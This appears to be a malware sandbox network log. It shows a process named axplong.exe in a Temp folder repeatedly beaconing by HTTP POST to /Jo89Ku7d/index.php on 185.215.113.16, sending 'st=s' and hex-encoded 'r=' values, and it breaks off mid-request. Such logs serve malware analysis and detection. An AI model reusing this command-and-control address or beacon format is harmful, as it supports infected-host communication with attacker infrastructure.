                    Sep 27, 2024 01:43:40.314256907 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:40.315042973 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:40.539505959 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    34 | 192.168.2.8 | 49746 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:40.736553907 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:42.041127920 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.041161060 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.041225910 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.042172909 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:42.267817974 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:42.488123894 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    35 | 192.168.2.8 | 49747 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:42.599138021 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:43.312964916 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:43.313816071 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:43.547933102 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    36 | 192.168.2.8 | 49748 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:43.740138054 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:44.463896036 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:44.464926958 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:44.700664043 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    37 | 192.168.2.8 | 49749 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:44.818308115 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:45.504646063 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:45.505395889 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:45.732218981 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    38 | 192.168.2.8 | 49750 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:46.062115908 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:46.741004944 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:46.815681934 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:47.039669037 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    39 | 192.168.2.8 | 49751 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:47.162480116 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:47.881541967 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:47.883569956 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:48.108424902 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    40 | 192.168.2.8 | 49752 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:48.224610090 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:48.936373949 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:48.937423944 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:49.170749903 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    41 | 192.168.2.8 | 49753 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:49.441677094 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:50.147353888 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:50.148298025 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:50.381314993 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    42 | 192.168.2.8 | 49754 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:50.489147902 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:51.199959040 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:51.200833082 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:51.435882092 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    43 | 192.168.2.8 | 49755 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:51.551899910 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:52.249130964 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:52.254076004 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:52.477385044 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    44 | 192.168.2.8 | 49756 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:52.923703909 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:53.636210918 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:53.637239933 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:53.869591951 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    45 | 192.168.2.8 | 49757 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:53.990462065 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:54.714360952 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:54.715310097 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:54.938955069 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    46 | 192.168.2.8 | 49758 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:55.051268101 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:55.742865086 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:55.783298969 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
